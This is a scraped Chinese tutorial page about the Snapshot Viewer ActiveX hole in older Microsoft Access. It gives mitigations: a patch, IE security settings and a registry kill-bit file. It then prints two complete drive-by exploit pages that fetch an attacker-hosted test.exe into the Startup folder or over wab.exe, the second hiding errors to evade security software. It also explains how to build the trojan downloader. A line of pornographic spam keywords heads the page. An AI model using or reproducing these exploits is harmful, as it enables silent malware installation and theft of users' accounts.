日韩天天综合网_野战两个奶头被亲到高潮_亚洲日韩欧美精品综合_av女人天堂污污污_视频一区**字幕无弹窗_国产亚洲欧美小视频_国内性爱精品在线免费视频_国产一级电影在线播放_日韩欧美内地福利_亚洲一二三不卡片区

如何堵住電腦中的Access漏洞 拒絕惡意網(wǎng)站_Access數(shù)據(jù)庫(kù)教程

編輯Tag賺U幣
教程Tag:暫無Tag,歡迎添加,賺取U幣!

推薦:解答Access如何制作復(fù)雜報(bào)表
如何制作復(fù)雜報(bào)表——利用Excel輸出復(fù)雜報(bào)表   在讀這篇文章以前首先要提醒大家,Access 本身的報(bào)表也具有很強(qiáng)的實(shí)用性和強(qiáng)大的功能,只有當(dāng)你發(fā)掘了其本身全部的功能

Access漏洞威脅的潛在人群十分巨大。目前已經(jīng)有不少利用該漏洞的惡意網(wǎng)站了,一旦用戶訪問這些頁(yè)面就會(huì)被植入木馬下載器,這些木馬下載器成功進(jìn)入用戶系統(tǒng)并執(zhí)行后,就會(huì)下載其他的惡意程序木馬,試圖盜取用戶的QQ、網(wǎng)游等賬號(hào),危險(xiǎn)不言而喻。

本次Access漏洞除Office2007版本外,在以前的版本中廣泛存在。由于用戶在安裝Office的時(shí)候很多都是選擇的默認(rèn)安裝,附帶也安裝了Access,所以漏洞威脅的用戶群數(shù)量非常的巨大。

HTTP GET功能導(dǎo)致漏洞出現(xiàn)

本次的Access漏洞的全名稱為“Microsoft Office Snapshot Viewer ActiveX Exploit 漏洞”,是一個(gè)ActiveX控件漏洞。該漏洞存在于snapview.ocx控件中,出現(xiàn)的原因是因?yàn)樵摽丶哂蠬TTP GET功能,這個(gè)功能可以從指定的網(wǎng)址下載指定的文件。

黑客要利用該漏洞,先要特制一個(gè)惡意網(wǎng)站引誘用戶訪問。當(dāng)用戶打開該網(wǎng)頁(yè)的時(shí)候,惡意網(wǎng)址就賦給了HTTP GET功能,該功能被激活后就偷偷從惡意網(wǎng)址下載病毒,這樣病毒就可以神不知鬼不覺地進(jìn)入用戶的系統(tǒng)中,威脅用戶的各種賬號(hào)和密碼。受這個(gè)漏洞影響的Access版本有2003、2002、2000。

Access漏洞解決方案

方案1:現(xiàn)在已經(jīng)有了該漏洞的補(bǔ)丁了,請(qǐng)大家趕快到http://www.shudoo.com/bzsoft下載。此外,我們還可以在“工具→Internet選項(xiàng)→安全”中,選擇“Internet”圖標(biāo),然后將下面的安全級(jí)別中設(shè)置為“高”(圖3),這樣可以有效地阻止網(wǎng)頁(yè)木馬入侵。

圖3

方案2 :將以下內(nèi)容復(fù)制在記事本中,另存為1.reg,然后雙擊導(dǎo)入注冊(cè)表也可以堵上漏洞。


Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{F0E42D50-368C-11D0-AD81-00A0C90DC8D9}]
“Compatibility Flags”=dword:00000400
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{F0E42D60-368C-11D0-AD81-00A0C90DC8D9}]
“Compatibility Flags”=dword:00000400
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{F2175210-368C-11D0-AD81-00A0C90DC8D9}]
“Compatibility Flags”=dword:00000400

目前黑客利用Access漏洞的主要方式

方式1:寫入啟動(dòng)項(xiàng)

先申請(qǐng)一個(gè)免費(fèi)的Web空間,用Mini downloader by SEC配置網(wǎng)頁(yè)木馬,在“URL”處輸入網(wǎng)頁(yè)木馬地址,再點(diǎn)擊“Creat”,又再?gòu)棾龃翱谥袑⑽募4鏋閠est.exe,這樣就網(wǎng)頁(yè)木馬就配置好了。

 

接著將test.exe上傳到先前申請(qǐng)的免費(fèi)空間里面,病毒地址就是:http://(這里是申請(qǐng)的空間地址)/test.exe 。將以下漏洞的利用代碼復(fù)制粘貼到新建的記事本里,另存為test.html。


<html>
<object classid='clsid:F0E42D50-368C-11D0-AD81-00A0C90DC8D9′ id='obj'></object>
<script language='javascript'>
var buf1 = ‘http://(這里是申請(qǐng)的空間地址)/test.exe';
var buf2 = ‘C:/Documents and Settings/All Users/「開始」菜單/程序/啟動(dòng)/test.exe';
obj.SnapshotPath = buf1;
obj.CompressedPath = buf2;
</script>
</html>
  

最后將test.html上傳到空間里,得到病毒的訪問地址:http://(這里是空間地址)/test.html。做到這步,剩下的工作就是傳播網(wǎng)址引誘用戶訪問了。當(dāng)用戶訪問該網(wǎng)頁(yè)時(shí)就會(huì)中招,用戶的電腦會(huì)在啟動(dòng)項(xiàng)里出現(xiàn)test.exe文件�! �

 

點(diǎn)評(píng):這種方式有個(gè)缺點(diǎn),就是有些安全軟件會(huì)提示有程序?qū)懭雴?dòng)項(xiàng)。

方式2:不寫入啟動(dòng)項(xiàng)

將以下代碼復(fù)制到新建的記事本中,另存為test.html上傳到空間即可。當(dāng)用戶訪問該網(wǎng)頁(yè)時(shí)也會(huì)中招,不過啟動(dòng)項(xiàng)里沒有test.exe文件,用戶無法察覺自己中毒了。


<html>
<body>
<script type="text/javascript">
function killErrors() {
return true;
}
window.onerror = killErrors;
var x;
var obj;
var mycars = new Array();
mycars[0] = "C:/Program Files/Outlook Express/wab.exe";
mycars[1] = "d:/Program Files/Outlook Express/wab.exe";
var objlcx = new ActiveXObject("snpvw.Snapshot Viewer Control.1");
if(objlcx="[object]")
{
setTimeout('window.location = "[url=ldap://"]ldap://"',3000[/url]);
for (x in mycars)
{
obj = new ActiveXObject("snpvw.Snapshot Viewer Control.1")
var buf1 = 'http://(這里是申請(qǐng)的空間地址)/test.exe';
var buf2=mycars[x];
obj.Zoom = 0;
obj.ShowNavigationButtons = false;
obj.AllowContextMenu = false;
obj.SnapshotPath = buf1;
try
{
obj.CompressedPath = buf2;
obj.PrintSnapshot();
}catch(e){}
}
}
</script>
</body>
</html>

點(diǎn)評(píng):這種方式無需寫入啟動(dòng)項(xiàng),這樣安全軟件就不會(huì)有任何提示了,在用戶訪問惡意頁(yè)面的時(shí)候直接中馬,使用戶中馬的概率更高。

分享:淺談Access如何維護(hù)表的參照完整性
為了去除數(shù)據(jù)表可能存在冗余的可能性和數(shù)據(jù)的完整性,需要設(shè)計(jì)把一張表拆分成多張表,表與表之間通過參照完整性來維護(hù)表之關(guān)的關(guān)系。 設(shè)計(jì)表的時(shí)候,被參照的表的字段稱為主鍵,參考主

來源:模板無憂//所屬分類:Access數(shù)據(jù)庫(kù)教程/更新時(shí)間:2009-08-01
相關(guān)Access數(shù)據(jù)庫(kù)教程